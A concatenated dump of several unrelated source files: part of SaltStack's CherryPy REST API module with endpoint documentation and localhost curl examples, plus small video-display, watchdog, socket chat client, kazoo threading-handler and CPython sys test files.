:status 401: |401|
:status 406: |406|
**Example request:**
.. code-block:: bash
curl -sS localhost:8000/run \\
-H 'Accept: application/x-yaml' \\
-H 'Content-type: application/json' \\
-d '[{
"client": "local",
"tgt": "*",
"fun": "test.ping",
"username": "saltdev",
"password": "saltdev",
"eauth": "auto"
}]'
**Or** using a Salt Eauth token:
.. code-block:: bash
curl -sS localhost:8000/run \\
-H 'Accept: application/x-yaml' \\
-H 'Content-type: application/json' \\
-d '[{
"client": "local",
"tgt": "*",
"fun": "test.ping",
"token": "<salt eauth token here>"
}]'
.. code-block:: text
POST /run HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
Content-Length: 75
Content-Type: application/json
[{"client": "local", "tgt": "*", "fun": "test.ping", "username": "saltdev", "password": "saltdev", "eauth": "auto"}]
**Example response:**
.. code-block:: text
HTTP/1.1 200 OK
Content-Length: 73
Content-Type: application/x-yaml
return:
- ms-0: true
ms-1: true
ms-2: true
ms-3: true
ms-4: true
The /run endpoint can also be used to issue commands using the salt-ssh
subsystem. When using salt-ssh, eauth credentials must also be
supplied, and are subject to :ref:`eauth access-control lists <acl>`.
All SSH client requests are synchronous.
**Example SSH client request:**
.. code-block:: bash
curl -sS localhost:8000/run \\
-H 'Accept: application/x-yaml' \\
-d client='ssh' \\
-d tgt='*' \\
-d username='saltdev' \\
-d password='saltdev' \\
-d eauth='auto' \\
-d fun='test.ping'
.. code-block:: text
POST /run HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
Content-Length: 75
Content-Type: application/x-www-form-urlencoded
**Example SSH response:**
.. code-block:: text
return:
- silver:
_stamp: '2020-09-08T23:04:28.912609'
fun: test.ping
fun_args: []
id: silver
jid: '20200908230427905565'
retcode: 0
return: true
"""
return {
"return": list(self.exec_lowstate()),
}
class Events:
"""
Expose the Salt event bus
The event bus on the Salt master exposes a large variety of things, notably
when executions are started on the master and also when minions ultimately
return their results. This URL provides a real-time window into a running
Salt infrastructure.
.. seealso:: :ref:`events`
"""
exposed = True
_cp_config = dict(
LowDataAdapter._cp_config,
**{
"response.stream": True,
"tools.encode.encoding": "utf-8",
# Auth handled manually below
"tools.salt_auth.on": False,
"tools.hypermedia_in.on": False,
"tools.hypermedia_out.on": False,
}
)
def __init__(self):
self.opts = cherrypy.config["saltopts"]
self.resolver = salt.auth.Resolver(self.opts)
def _is_valid_token(self, auth_token):
"""
Check if this is a valid salt-api token or valid Salt token
salt-api tokens are regular session tokens that tie back to a real Salt
token. Salt tokens are tokens generated by Salt's eauth system.
:return bool: True if valid, False if not valid.
"""
# Make sure that auth token is hex. If it's None, or something other
# than hex, this will raise a ValueError.
try:
int(auth_token, 16)
except (TypeError, ValueError):
return False
# First check if the given token is in our session table; if so it's a
# salt-api token and we need to get the Salt token from there.
orig_session, _ = cherrypy.session.cache.get(auth_token, ({}, None))
# If it's not in the session table, assume it's a regular Salt token.
salt_token = orig_session.get("token", auth_token)
        # The eauth system does not currently support perms for the event
        # stream, so we're just checking whether the token exists, not whether
        # it allows access.
if salt_token and self.resolver.get_token(salt_token):
return True
return False
def GET(self, token=None, salt_token=None):
r"""
An HTTP stream of the Salt master event bus
This stream is formatted per the Server Sent Events (SSE) spec. Each
event is formatted as JSON.
.. http:get:: /events
:status 200: |200|
:status 401: |401|
:status 406: |406|
:query token: **optional** parameter containing the token
ordinarily supplied via the X-Auth-Token header in order to
allow cross-domain requests in browsers that do not include
CORS support in the EventSource API. E.g.,
``curl -NsS localhost:8000/events?token=308650d``
:query salt_token: **optional** parameter containing a raw Salt
*eauth token* (not to be confused with the token returned from
the /login URL). E.g.,
``curl -NsS localhost:8000/events?salt_token=30742765``
**Example request:**
.. code-block:: bash
curl -NsS localhost:8000/events
.. code-block:: text
GET /events HTTP/1.1
Host: localhost:8000
**Example response:**
Note, the ``tag`` field is not part of the spec. SSE compliant clients
should ignore unknown fields. This addition allows non-compliant
        clients to only watch for certain tags without having to deserialize the
JSON object each time.
.. code-block:: text
HTTP/1.1 200 OK
Connection: keep-alive
Cache-Control: no-cache
Content-Type: text/event-stream;charset=utf-8
retry: 400
tag: salt/job/20130802115730568475/new
data: {'tag': 'salt/job/20130802115730568475/new', 'data': {'minions': ['ms-4', 'ms-3', 'ms-2', 'ms-1', 'ms-0']}}
tag: salt/job/20130802115730568475/ret/jerry
data: {'tag': 'salt/job/20130802115730568475/ret/jerry', 'data': {'jid': '20130802115730568475', 'return': True, 'retcode': 0, 'success': True, 'cmd': '_return', 'fun': 'test.ping', 'id': 'ms-1'}}
The event stream can be easily consumed via JavaScript:
.. code-block:: javascript
var source = new EventSource('/events');
source.onopen = function() { console.info('Listening ...') };
source.onerror = function(err) { console.error(err) };
source.onmessage = function(message) {
var saltEvent = JSON.parse(message.data);
console.log(saltEvent.tag, saltEvent.data);
};
        Note, the SSE stream is completely asynchronous and Salt is very fast.
        If a job is created using a regular POST request, it is
possible that the job return will be available on the SSE stream before
the response for the POST request arrives. It is important to take that
asynchronicity into account when designing an application. Below are
some general guidelines.
* Subscribe to the SSE stream _before_ creating any events.
* Process SSE events directly as they arrive and don't wait for any
other process to "complete" first (like an ajax request).
* Keep a buffer of events if the event stream must be used for
synchronous lookups.
* Be cautious in writing Salt's event stream directly to the DOM. It is
very busy and can quickly overwhelm the memory allocated to a
browser tab.
A full, working proof-of-concept JavaScript application is available
:blob:`adjacent to this file <salt/netapi/rest_cherrypy/index.html>`.
It can be viewed by pointing a browser at the ``/app`` endpoint in a
running ``rest_cherrypy`` instance.
Or using CORS:
.. code-block:: javascript
var source = new EventSource('/events?token=ecd589e4e01912cf3c4035afad73426dbb8dba75', {withCredentials: true});
It is also possible to consume the stream via the shell.
Records are separated by blank lines; the ``data:`` and ``tag:``
prefixes will need to be removed manually before attempting to
unserialize the JSON.
curl's ``-N`` flag turns off input buffering which is required to
process the stream incrementally.
Here is a basic example of printing each event as it comes in:
.. code-block:: bash
curl -NsS localhost:8000/events |\
while IFS= read -r line ; do
echo $line
done
Here is an example of using awk to filter events based on tag:
.. code-block:: bash
curl -NsS localhost:8000/events |\
awk '
BEGIN { RS=""; FS="\\n" }
$1 ~ /^tag: salt\/job\/[0-9]+\/new$/ { print $0 }
'
tag: salt/job/20140112010149808995/new
data: {"tag": "salt/job/20140112010149808995/new", "data": {"tgt_type": "glob", "jid": "20140112010149808995", "tgt": "jerry", "_stamp": "2014-01-12_01:01:49.809617", "user": "shouse", "arg": [], "fun": "test.ping", "minions": ["jerry"]}}
tag: 20140112010149808995
data: {"tag": "20140112010149808995", "data": {"fun_args": [], "jid": "20140112010149808995", "return": true, "retcode": 0, "success": true, "cmd": "_return", "_stamp": "2014-01-12_01:01:49.819316", "fun": "test.ping", "id": "jerry"}}
"""
cookies = cherrypy.request.cookie
auth_token = (
token
or salt_token
or (cookies["session_id"].value if "session_id" in cookies else None)
)
if not self._is_valid_token(auth_token):
raise cherrypy.HTTPError(401)
# Release the session lock before starting the long-running response
cherrypy.session.release_lock()
cherrypy.response.headers["Content-Type"] = "text/event-stream"
cherrypy.response.headers["Cache-Control"] = "no-cache"
cherrypy.response.headers["Connection"] = "keep-alive"
def listen():
"""
An iterator to yield Salt events
"""
event = salt.utils.event.get_event(
"master",
sock_dir=self.opts["sock_dir"],
transport=self.opts["transport"],
opts=self.opts,
listen=True,
)
stream = event.iter_events(full=True, auto_reconnect=True)
yield "retry: 400\n" # future lint: disable=blacklisted-function
while True:
data = next(stream)
yield "tag: {}\n".format(
data.get("tag", "")
) # future lint: disable=blacklisted-function
yield "data: {}\n\n".format(
salt.utils.json.dumps(data)
) # future lint: disable=blacklisted-function
return listen()
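# A minimal client-side sketch (not part of the original module): one way to
# consume the /events SSE stream from Python. The host, port, token value, and
# the use of the 'requests' library are assumptions for illustration only.
if __name__ == "__main__":
    import json

    import requests

    token = "6d1b722e"  # hypothetical session token obtained from /login
    resp = requests.get(
        "http://localhost:8000/events",
        headers={"X-Auth-Token": token},
        stream=True,
    )
    for line in resp.iter_lines(decode_unicode=True):
        # Records look like "tag: ..." / "data: {...}" separated by blank lines.
        if line and line.startswith("data: "):
            event = json.loads(line[len("data: "):])
            print(event["tag"], event["data"])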
class WebsocketEndpoint:
"""
Open a WebSocket connection to Salt's event bus
The event bus on the Salt master exposes a large variety of things, notably
when executions are started on the master and also when minions ultimately
return their results. This URL provides a real-time window into a running
Salt infrastructure. Uses websocket as the transport mechanism.
.. seealso:: :ref:`events`
"""
exposed = True
_cp_config = dict(
LowDataAdapter._cp_config,
**{
"response.stream": True,
"tools.encode.encoding": "utf-8",
# Auth handled manually below
"tools.salt_auth.on": False,
"tools.hypermedia_in.on": False,
"tools.hypermedia_out.on": False,
"tools.websocket.on": True,
"tools.websocket.handler_cls": websockets.SynchronizingWebsocket,
}
)
def __init__(self):
self.opts = cherrypy.config["saltopts"]
self.auth = salt.auth.LoadAuth(self.opts)
def GET(self, token=None, **kwargs):
"""
Return a websocket connection of Salt's event stream
.. http:get:: /ws/(token)
:query format_events: The event stream will undergo server-side
formatting if the ``format_events`` URL parameter is included
in the request. This can be useful to avoid formatting on the
client-side:
.. code-block:: bash
curl -NsS <...snip...> localhost:8000/ws?format_events
:reqheader X-Auth-Token: an authentication token from
:py:class:`~Login`.
:status 101: switching to the websockets protocol
:status 401: |401|
:status 406: |406|
**Example request:** ::
curl -NsSk \\
-H 'X-Auth-Token: ffedf49d' \\
-H 'Host: localhost:8000' \\
-H 'Connection: Upgrade' \\
-H 'Upgrade: websocket' \\
-H 'Origin: https://localhost:8000' \\
-H 'Sec-WebSocket-Version: 13' \\
-H 'Sec-WebSocket-Key: '"$(echo -n $RANDOM | base64)" \\
localhost:8000/ws
.. code-block:: text
GET /ws HTTP/1.1
Connection: Upgrade
Upgrade: websocket
Host: localhost:8000
Origin: https://localhost:8000
Sec-WebSocket-Version: 13
Sec-WebSocket-Key: s65VsgHigh7v/Jcf4nXHnA==
X-Auth-Token: ffedf49d
**Example response**:
.. code-block:: text
HTTP/1.1 101 Switching Protocols
Upgrade: websocket
Connection: Upgrade
Sec-WebSocket-Accept: mWZjBV9FCglzn1rIKJAxrTFlnJE=
Sec-WebSocket-Version: 13
An authentication token **may optionally** be passed as part of the URL
for browsers that cannot be configured to send the authentication
header or cookie:
.. code-block:: bash
curl -NsS <...snip...> localhost:8000/ws/ffedf49d
The event stream can be easily consumed via JavaScript:
.. code-block:: javascript
// Note, you must be authenticated!
            var source = new WebSocket('ws://localhost:8000/ws/d0ce6c1a');
source.onerror = function(e) { console.debug('error!', e); };
source.onmessage = function(e) { console.debug(e.data); };
source.send('websocket client ready')
source.close();
Or via Python, using the Python module `websocket-client
<https://pypi.python.org/pypi/websocket-client/>`_ for example.
.. code-block:: python
# Note, you must be authenticated!
from websocket import create_connection
ws = create_connection('ws://localhost:8000/ws/d0ce6c1a')
ws.send('websocket client ready')
# Look at https://pypi.python.org/pypi/websocket-client/ for more
# examples.
while listening_to_events:
                print(ws.recv())
ws.close()
        The above examples show how to establish a websocket connection to Salt
        and activate real-time updates from Salt's event stream by signaling
        ``websocket client ready``.
"""
        # Pulling the session token from a URL param is a workaround for
# browsers not supporting CORS in the EventSource API.
if token:
orig_session, _ = cherrypy.session.cache.get(token, ({}, None))
salt_token = orig_session.get("token")
else:
salt_token = cherrypy.session.get("token")
# Manually verify the token
if not salt_token or not self.auth.get_tok(salt_token):
raise cherrypy.HTTPError(401)
# Release the session lock before starting the long-running response
cherrypy.session.release_lock()
# A handler is the server side end of the websocket connection. Each
# request spawns a new instance of this handler
handler = cherrypy.request.ws_handler
def event_stream(handler, pipe):
"""
An iterator to return Salt events (and optionally format them)
"""
# blocks until send is called on the parent end of this pipe.
pipe.recv()
event = salt.utils.event.get_event(
"master",
sock_dir=self.opts["sock_dir"],
transport=self.opts["transport"],
opts=self.opts,
listen=True,
)
stream = event.iter_events(full=True, auto_reconnect=True)
SaltInfo = event_processor.SaltInfo(handler)
def signal_handler(signal, frame):
os._exit(0)
signal.signal(signal.SIGTERM, signal_handler)
while True:
data = next(stream)
if data:
try: # work around try to decode catch unicode errors
if "format_events" in kwargs:
SaltInfo.process(data, salt_token, self.opts)
else:
handler.send(
"data: {}\n\n".format(
salt.utils.json.dumps(data)
), # future lint: disable=blacklisted-function
False,
)
except UnicodeDecodeError:
logger.error(
"Error: Salt event has non UTF-8 data:\n{}".format(data)
)
parent_pipe, child_pipe = Pipe()
handler.pipe = parent_pipe
handler.opts = self.opts
# Process to handle asynchronous push to a client.
# Each GET request causes a process to be kicked off.
proc = Process(target=event_stream, args=(handler, child_pipe))
proc.start()
class Webhook:
"""
A generic web hook entry point that fires an event on Salt's event bus
External services can POST data to this URL to trigger an event in Salt.
For example, Amazon SNS, Jenkins-CI or Travis-CI, or GitHub web hooks.
.. note:: Be mindful of security
Salt's Reactor can run any code. A Reactor SLS that responds to a hook
event is responsible for validating that the event came from a trusted
source and contains valid data.
**This is a generic interface and securing it is up to you!**
    This URL requires authentication; however, not all external services can
    be configured to authenticate. For this reason, authentication can be
selectively disabled for this URL. Follow best practices -- always use
SSL, pass a secret key, configure the firewall to only allow traffic
from a known source, etc.
The event data is taken from the request body. The
:mailheader:`Content-Type` header is respected for the payload.
The event tag is prefixed with ``salt/netapi/hook`` and the URL path is
appended to the end. For example, a ``POST`` request sent to
``/hook/mycompany/myapp/mydata`` will produce a Salt event with the tag
``salt/netapi/hook/mycompany/myapp/mydata``.
The following is an example ``.travis.yml`` file to send notifications to
Salt of successful test runs:
.. code-block:: yaml
language: python
script: python -m unittest tests
after_success:
- |
curl -sSk https://saltapi-url.example.com:8000/hook/travis/build/success \
-d branch="${TRAVIS_BRANCH}" \
-d commit="${TRAVIS_COMMIT}"
.. seealso:: :ref:`events`, :ref:`reactor <reactor>`
"""
exposed = True
tag_base = ["salt", "netapi", "hook"]
_cp_config = dict(
LowDataAdapter._cp_config,
**{
# Don't do any lowdata processing on the POST data
"tools.lowdata_fmt.on": True,
# Auth can be overridden in __init__().
"tools.salt_auth.on": True,
}
)
def __init__(self):
self.opts = cherrypy.config["saltopts"]
self.event = salt.utils.event.get_event(
"master",
sock_dir=self.opts["sock_dir"],
transport=self.opts["transport"],
opts=self.opts,
listen=False,
)
if cherrypy.config["apiopts"].get("webhook_disable_auth"):
self._cp_config["tools.salt_auth.on"] = False
def POST(self, *args, **kwargs):
"""
Fire an event in Salt with a custom event tag and data
.. http:post:: /hook
:status 200: |200|
:status 401: |401|
:status 406: |406|
:status 413: request body is too large
**Example request:**
.. code-block:: bash
curl -sS localhost:8000/hook \\
-H 'Content-type: application/json' \\
-d '{"foo": "Foo!", "bar": "Bar!"}'
.. code-block:: text
POST /hook HTTP/1.1
Host: localhost:8000
Content-Length: 16
Content-Type: application/json
{"foo": "Foo!", "bar": "Bar!"}
**Example response**:
.. code-block:: text
HTTP/1.1 200 OK
Content-Length: 14
Content-Type: application/json
{"success": true}
As a practical example, an internal continuous-integration build
server could send an HTTP POST request to the URL
``https://localhost:8000/hook/mycompany/build/success`` which contains
the result of a build and the SHA of the version that was built as
JSON. That would then produce the following event in Salt that could be
used to kick off a deployment via Salt's Reactor::
Event fired at Fri Feb 14 17:40:11 2014
*************************
Tag: salt/netapi/hook/mycompany/build/success
Data:
{'_stamp': '2014-02-14_17:40:11.440996',
'headers': {
'X-My-Secret-Key': 'F0fAgoQjIT@W',
'Content-Length': '37',
'Content-Type': 'application/json',
'Host': 'localhost:8000',
'Remote-Addr': '127.0.0.1'},
'post': {'revision': 'aa22a3c4b2e7', 'result': True}}
Salt's Reactor could listen for the event:
.. code-block:: yaml
reactor:
- 'salt/netapi/hook/mycompany/build/*':
- /srv/reactor/react_ci_builds.sls
And finally deploy the new build:
.. code-block:: jinja
{% set secret_key = data.get('headers', {}).get('X-My-Secret-Key') %}
{% set build = data.get('post', {}) %}
{% if secret_key == 'F0fAgoQjIT@W' and build.result == True %}
deploy_my_app:
cmd.state.sls:
- tgt: 'application*'
- arg:
- myapp.deploy
- kwarg:
pillar:
                      revision: {{ build.revision }}
{% endif %}
"""
tag = "/".join(itertools.chain(self.tag_base, args))
data = cherrypy.serving.request.unserialized_data
if not data:
data = {}
raw_body = getattr(cherrypy.serving.request, "raw_body", "")
headers = dict(cherrypy.request.headers)
ret = self.event.fire_event(
{"body": raw_body, "post": data, "headers": headers}, tag
)
return {"success": ret}
class Stats:
"""
Expose statistics on the running CherryPy server
"""
exposed = True
_cp_config = dict(LowDataAdapter._cp_config, **{"tools.salt_auth.on": True})
def __init__(self):
if cherrypy.config["apiopts"].get("stats_disable_auth"):
self._cp_config["tools.salt_auth.on"] = False
def GET(self):
"""
Return a dump of statistics collected from the CherryPy server
.. http:get:: /stats
:reqheader X-Auth-Token: |req_token|
:reqheader Accept: |req_accept|
:resheader Content-Type: |res_ct|
:status 200: |200|
:status 401: |401|
:status 406: |406|
"""
if hasattr(logging, "statistics"):
return cpstats.extrapolate_statistics(logging.statistics)
return {}
class App:
"""
Class to serve HTML5 apps
"""
exposed = True
def GET(self, *args):
"""
Serve a single static file ignoring the remaining path
This is useful in combination with a browser-based app using the HTML5
history API.
        .. http:get:: /app
:reqheader X-Auth-Token: |req_token|
:status 200: |200|
:status 401: |401|
"""
apiopts = cherrypy.config["apiopts"]
default_index = os.path.abspath(
os.path.join(os.path.dirname(__file__), "index.html")
)
return cherrypy.lib.static.serve_file(apiopts.get("app", default_index))
class API:
"""
Collect configuration and URL map for building the CherryPy app
"""
url_map = {
"index": LowDataAdapter,
"login": Login,
"logout": Logout,
"token": Token,
"minions": Minions,
"run": Run,
"jobs": Jobs,
"keys": Keys,
"events": Events,
"stats": Stats,
}
def _setattr_url_map(self):
"""
Set an attribute on the local instance for each key/val in url_map
CherryPy uses class attributes to resolve URLs.
"""
if self.apiopts.get("enable_sessions", True) is False:
url_blacklist = ["login", "logout", "minions", "jobs"]
else:
url_blacklist = []
urls = (
(url, cls) for url, cls in self.url_map.items() if url not in url_blacklist
)
for url, cls in urls:
setattr(self, url, cls())
def _update_url_map(self):
"""
Assemble any dynamic or configurable URLs
"""
if HAS_WEBSOCKETS:
self.url_map.update({"ws": WebsocketEndpoint})
# Allow the Webhook URL to be overridden from the conf.
self.url_map.update(
{self.apiopts.get("webhook_url", "hook").lstrip("/"): Webhook}
)
# Enable the single-page JS app URL.
self.url_map.update({self.apiopts.get("app_path", "app").lstrip("/"): App})
def __init__(self):
self.opts = cherrypy.config["saltopts"]
self.apiopts = cherrypy.config["apiopts"]
self._update_url_map()
self._setattr_url_map()
def get_conf(self):
"""
Combine the CherryPy configuration with the rest_cherrypy config values
pulled from the master config and return the CherryPy configuration
"""
conf = {
"global": {
"server.socket_host": self.apiopts.get("host", "0.0.0.0"),
"server.socket_port": self.apiopts.get("port", 8000),
"server.thread_pool": self.apiopts.get("thread_pool", 100),
"server.socket_queue_size": self.apiopts.get("queue_size", 30),
"max_request_body_size": self.apiopts.get(
"max_request_body_size", 1048576
),
"debug": self.apiopts.get("debug", False),
"log.access_file": self.apiopts.get("log_access_file", ""),
"log.error_file": self.apiopts.get("log_error_file", ""),
},
"/": {
"request.dispatch": cherrypy.dispatch.MethodDispatcher(),
"tools.trailing_slash.on": True,
"tools.gzip.on": True,
"tools.html_override.on": True,
"tools.cors_tool.on": True,
},
}
if salt.utils.versions.version_cmp(cherrypy.__version__, "12.0.0") < 0:
# CherryPy >= 12.0 no longer supports "timeout_monitor", only set
# this config option when using an older version of CherryPy.
# See Issue #44601 for more information.
conf["global"]["engine.timeout_monitor.on"] = self.apiopts.get(
"expire_responses", True
)
if cpstats and self.apiopts.get("collect_stats", False):
conf["/"]["tools.cpstats.on"] = True
if "favicon" in self.apiopts:
conf["/favicon.ico"] = {
"tools.staticfile.on": True,
"tools.staticfile.filename": self.apiopts["favicon"],
}
if self.apiopts.get("debug", False) is False:
conf["global"]["environment"] = "production"
# Serve static media if the directory has been set in the configuration
if "static" in self.apiopts:
conf[self.apiopts.get("static_path", "/static")] = {
"tools.staticdir.on": True,
"tools.staticdir.dir": self.apiopts["static"],
}
# Add to global config
cherrypy.config.update(conf["global"])
return conf
def get_app(opts):
"""
Returns a WSGI app and a configuration dictionary
"""
apiopts = opts.get(__name__.rsplit(".", 2)[-2], {}) # rest_cherrypy opts
# Add Salt and salt-api config options to the main CherryPy config dict
cherrypy.config["saltopts"] = opts
cherrypy.config["apiopts"] = apiopts
root = API() # cherrypy app
cpyopts = root.get_conf() # cherrypy app opts
return root, apiopts, cpyopts
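# A minimal mounting sketch (not part of the original module): roughly how a
# CherryPy process might serve the app returned by get_app(). The config path
# '/etc/salt/master' and the 'root_prefix' option are assumptions; adjust them
# for your deployment.
if __name__ == "__main__":
    import salt.config

    master_opts = salt.config.client_config("/etc/salt/master")
    root, apiopts, cpyopts = get_app(master_opts)
    # Mount the API object at the configured URL prefix and start CherryPy.
    cherrypy.quickstart(root, apiopts.get("root_prefix", "/"), cpyopts)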
|
VideoShow.py
|
from threading import Thread
import cv2
class VideoShow:
"""
Class that continuously shows a frame using a dedicated thread.
"""
    def __init__(self, frame=None, source=None):
self.frame = frame
self.stopped = False
self.source = source
def start(self):
Thread(target=self.show, args=()).start()
return self
def show(self):
while not self.stopped:
cv2.imshow(self.source, self.frame)
if cv2.waitKey(1) == ord("q"):
self.stopped = True
def stop(self):
self.stopped = True
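# A minimal usage sketch (not part of the original module). Assumptions: a
# webcam is available at index 0 and a display is attached. Frames are read in
# the main thread and handed to the VideoShow thread, which displays them until
# 'q' is pressed or reading fails.
if __name__ == "__main__":
    cap = cv2.VideoCapture(0)
    grabbed, frame = cap.read()
    shower = VideoShow(frame, source="webcam").start()
    while grabbed and not shower.stopped:
        grabbed, frame = cap.read()
        shower.frame = frame  # hand the newest frame to the display thread
    shower.stop()
    cap.release()
    cv2.destroyAllWindows()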
|
watchdog.py
|
import time
import threading
class WatchDog(object):
def __init__(self, timeout_func, timeout_in_seconds=10):
self.last_activity = time.time()
self.timeout_in_seconds = timeout_in_seconds
self.timeout_func = timeout_func
def run(self):
watchdog_thread = threading.Thread(target=self._watchdog)
self.process_still_active()
watchdog_thread.start()
def _watchdog(self):
while time.time() - self.last_activity < self.timeout_in_seconds:
time.sleep(1)
self.timeout_func()
def process_still_active(self):
self.last_activity = time.time()
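# A minimal usage sketch (not part of the original module): the timeout callback
# fires once no activity has been reported for timeout_in_seconds.
if __name__ == "__main__":
    def on_timeout():
        print("no activity for 3 seconds, timing out")

    dog = WatchDog(on_timeout, timeout_in_seconds=3)
    dog.run()
    for _ in range(2):
        time.sleep(1)
        dog.process_still_active()  # keep feeding the watchdog while working
    # Stop feeding; about 3 seconds later on_timeout() runs in the monitor thread.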
|
Main_Client.py
|
import socket, selectors, threading, sys
import tkinter as tk
import Message_Client, gui
from Custom_Errors import *
def start_connection(host, port, name):
addr = (host, port)
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.setblocking(False)
sock.connect_ex(addr) # Connecting to server
print("Connecting to: " + repr(addr))
events = selectors.EVENT_WRITE
    message = Message_Client.Message(sel, sock, addr, Name=name, RoomID=0)
sel.register(sock, events, data=message)
def Client_loop(main_window):
while True:
events = sel.select(timeout=1)
for key, mask in events:
message = key.data
try:
#message.position = main_window.my_position()
#print("message.position:",message.position)
message.process(mask,main_window)
#main_window.update_positions(message.message) # Updating positions in the GUI
except ServerDisconnectError:
print("Server closed connection.")
message.close()
except Exception:
print("Something went wrong with 'message.process(mask)'")
message.close()
# Check for a socket being monitored to continue.
if not sel.get_map():
sel.close()
break
######## PROGRAM STARTS HERE #########
if __name__ == '__main__':
input_form = tk.Tk() # Starting a form where we ask for the name of the user
input_window = gui.name_input_window(input_form)
input_window.pack()
input_form.mainloop()
name = input_window.name
    del input_form  # We don't need it anymore
if name is not None:
# Connecting to server
sel = selectors.DefaultSelector()
host, port = ['127.0.0.1', 65432]
start_connection(host, port, name)
# Starting the main application
root = tk.Tk()
mainWindow = gui.window(root, name)
mainWindow.pack()
        Client_thread = threading.Thread(target=Client_loop, args=(mainWindow,), daemon=True)
        Client_thread.start()
root.mainloop()
sys.exit()
|
threading.py
|
"""A threading based handler.
The :class:`SequentialThreadingHandler` is intended for regular Python
environments that use threads.
.. warning::
Do not use :class:`SequentialThreadingHandler` with applications
using asynchronous event loops (like gevent). Use the
:class:`~kazoo.handlers.gevent.SequentialGeventHandler` instead.
"""
from __future__ import absolute_import
import errno
import logging
import select
import socket
import threading
import time
import kazoo.python2atexit as python2atexit
try:
import Queue
except ImportError: # pragma: nocover
import queue as Queue
from kazoo.handlers import utils
# sentinel objects
_STOP = object()
log = logging.getLogger(__name__)
class KazooTimeoutError(Exception):
pass
class AsyncResult(utils.AsyncResult):
"""A one-time event that stores a value or an exception"""
def __init__(self, handler):
super(AsyncResult, self).__init__(handler,
threading.Condition,
KazooTimeoutError)
class SequentialThreadingHandler(object):
"""Threading handler for sequentially executing callbacks.
This handler executes callbacks in a sequential manner. A queue is
created for each of the callback events, so that each type of event
has its callback type run sequentially. These are split into two
queues, one for watch events and one for async result completion
callbacks.
Each queue type has a thread worker that pulls the callback event
off the queue and runs it in the order the client sees it.
This split helps ensure that watch callbacks won't block session
re-establishment should the connection be lost during a Zookeeper
client call.
Watch and completion callbacks should avoid blocking behavior as
the next callback of that type won't be run until it completes. If
you need to block, spawn a new thread and return immediately so
callbacks can proceed.
.. note::
Completion callbacks can block to wait on Zookeeper calls, but
no other completion callbacks will execute until the callback
returns.
"""
name = "sequential_threading_handler"
timeout_exception = KazooTimeoutError
sleep_func = staticmethod(time.sleep)
queue_impl = Queue.Queue
queue_empty = Queue.Empty
def __init__(self):
"""Create a :class:`SequentialThreadingHandler` instance"""
self.callback_queue = self.queue_impl()
self.completion_queue = self.queue_impl()
self._running = False
self._state_change = threading.Lock()
self._workers = []
def _create_thread_worker(self, queue):
def _thread_worker(): # pragma: nocover
while True:
try:
func = queue.get()
try:
if func is _STOP:
break
func()
except Exception:
log.exception("Exception in worker queue thread")
finally:
queue.task_done()
except self.queue_empty:
continue
t = self.spawn(_thread_worker)
return t
def start(self):
"""Start the worker threads."""
with self._state_change:
if self._running:
return
# Spawn our worker threads, we have
# - A callback worker for watch events to be called
# - A completion worker for completion events to be called
for queue in (self.completion_queue, self.callback_queue):
w = self._create_thread_worker(queue)
self._workers.append(w)
self._running = True
python2atexit.register(self.stop)
def stop(self):
"""Stop the worker threads and empty all queues."""
with self._state_change:
if not self._running:
return
self._running = False
for queue in (self.completion_queue, self.callback_queue):
queue.put(_STOP)
self._workers.reverse()
while self._workers:
worker = self._workers.pop()
worker.join()
# Clear the queues
self.callback_queue = self.queue_impl()
self.completion_queue = self.queue_impl()
python2atexit.unregister(self.stop)
def select(self, *args, **kwargs):
# select() takes no kwargs, so it will be in args
timeout = args[3] if len(args) == 4 else None
# either the time to give up, or None
end = (time.time() + timeout) if timeout else None
while end is None or time.time() < end:
if end is not None:
args = list(args) # make a list, since tuples aren't mutable
args[3] = end - time.time() # set the timeout to the remaining time
try:
return select.select(*args, **kwargs)
except select.error as ex:
# if the system call was interrupted, we'll retry until timeout
# in Python 3, system call interruptions are a native exception
# in Python 2, they are not
errnum = ex.errno if isinstance(ex, OSError) else ex[0]
if errnum == errno.EINTR:
continue
raise
        # if we hit our timeout, let's return as a timeout
return ([], [], [])
def socket(self):
return utils.create_tcp_socket(socket)
def create_connection(self, *args, **kwargs):
return utils.create_tcp_connection(socket, *args, **kwargs)
def create_socket_pair(self):
return utils.create_socket_pair(socket)
def event_object(self):
"""Create an appropriate Event object"""
return threading.Event()
def lock_object(self):
"""Create a lock object"""
return threading.Lock()
def rlock_object(self):
"""Create an appropriate RLock object"""
return threading.RLock()
def async_result(self):
"""Create a :class:`AsyncResult` instance"""
return AsyncResult(self)
def spawn(self, func, *args, **kwargs):
t = threading.Thread(target=func, args=args, kwargs=kwargs)
t.daemon = True
t.start()
return t
def dispatch_callback(self, callback):
"""Dispatch to the callback object
The callback is put on separate queues to run depending on the
type as documented for the :class:`SequentialThreadingHandler`.
"""
self.callback_queue.put(lambda: callback.func(*callback.args))
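# A minimal standalone sketch (assumed usage outside a KazooClient): push a
# completion callback through the handler and wait on the AsyncResult it fulfils.
if __name__ == "__main__":
    handler = SequentialThreadingHandler()
    handler.start()
    result = handler.async_result()
    # The completion worker thread pops this callable and runs it sequentially.
    handler.completion_queue.put(lambda: result.set("done"))
    print(result.get(timeout=5))  # prints 'done'
    handler.stop()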
|
test_sys.py
|
from test import support
from test.support.script_helper import assert_python_ok, assert_python_failure
import builtins
import codecs
import gc
import locale
import operator
import os
import struct
import subprocess
import sys
import sysconfig
import test.support
import textwrap
import unittest
import warnings
# count the number of test runs, used to create unique
# strings to intern in test_intern()
INTERN_NUMRUNS = 0
class DisplayHookTest(unittest.TestCase):
def test_original_displayhook(self):
dh = sys.__displayhook__
with support.captured_stdout() as out:
dh(42)
self.assertEqual(out.getvalue(), "42\n")
self.assertEqual(builtins._, 42)
del builtins._
with support.captured_stdout() as out:
dh(None)
self.assertEqual(out.getvalue(), "")
self.assertTrue(not hasattr(builtins, "_"))
# sys.displayhook() requires arguments
self.assertRaises(TypeError, dh)
stdout = sys.stdout
try:
del sys.stdout
self.assertRaises(RuntimeError, dh, 42)
finally:
sys.stdout = stdout
def test_lost_displayhook(self):
displayhook = sys.displayhook
try:
del sys.displayhook
code = compile("42", "<string>", "single")
self.assertRaises(RuntimeError, eval, code)
finally:
sys.displayhook = displayhook
def test_custom_displayhook(self):
def baddisplayhook(obj):
raise ValueError
with support.swap_attr(sys, 'displayhook', baddisplayhook):
code = compile("42", "<string>", "single")
self.assertRaises(ValueError, eval, code)
class ExceptHookTest(unittest.TestCase):
def test_original_excepthook(self):
try:
raise ValueError(42)
except ValueError as exc:
